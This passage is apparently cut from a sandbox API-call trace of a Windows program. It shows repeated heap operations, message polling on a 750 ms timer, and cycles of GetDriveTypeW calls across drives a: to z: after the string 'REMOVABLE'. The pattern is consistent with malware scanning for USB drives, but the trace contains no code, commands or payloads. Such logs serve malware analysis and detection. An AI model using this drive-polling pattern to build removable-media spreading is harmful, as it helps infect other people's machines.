(in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0215.384] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0215.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0215.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.384] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.384] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0215.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0215.384] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0215.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0215.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0215.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0215.385] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.385] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.385] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.385] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.385] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0215.385] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.385] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0215.385] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.385] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0215.385] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0215.385] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.385] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.385] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.385] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.385] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.385] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.385] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.386] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.386] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.386] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.386] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.386] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.386] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.387] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.387] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.387] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.387] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.387] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.387] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.388] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.388] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.388] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.388] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.388] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.388] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.388] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.389] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.389] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.389] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.389] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.389] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.389] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.389] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.389] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.389] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.389] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.389] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.389] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.389] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.389] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.389] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.389] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.390] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0215.390] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.390] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.390] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f40 [0215.390] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f40 | out: hHeap=0x12c0000) returned 1 [0215.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.390] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0215.390] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0215.390] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0215.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0215.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0215.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.391] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.391] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.391] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.391] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.391] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.392] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.392] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.392] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.392] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0215.392] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0215.392] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.392] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0215.392] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.392] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0215.392] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.392] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.392] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0215.392] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.392] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.392] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0215.392] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.392] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.392] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.392] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.392] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.392] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0215.392] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.392] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.392] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.393] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.393] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.393] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.393] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.393] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.393] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.394] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.394] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.394] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.394] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.394] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.394] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.395] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.395] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.395] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.395] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.396] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.396] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.396] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.396] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.396] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.397] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.397] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.397] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.397] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.397] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.397] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.397] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.397] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.397] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.397] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0215.397] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.397] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.397] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.397] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.397] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.398] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.398] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.398] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.398] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.398] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.398] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.398] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.398] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.398] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0215.398] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0215.398] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.398] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0215.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.398] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0215.398] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.399] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0215.399] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.399] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.399] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.399] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.399] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.399] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.399] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.399] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.399] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.399] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.399] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.399] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.399] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.399] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.399] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0215.399] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.399] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.399] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.399] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.399] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0215.399] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.399] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.399] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0215.399] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.399] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.399] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0215.399] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.400] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.400] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.400] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.400] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0215.400] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.400] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.400] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.400] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.400] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.400] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.401] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.401] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.401] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.401] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.401] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.402] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.402] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.402] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.402] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.403] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.403] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.403] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.403] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.403] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.404] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.404] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.404] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.404] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.407] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.407] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.408] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.408] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.408] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.408] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.408] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.408] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.409] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.409] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.409] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.409] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.409] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.409] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0215.409] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.409] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.409] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.409] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.409] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.409] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.409] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.409] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.409] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.410] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0215.410] RtlAllocateHeap 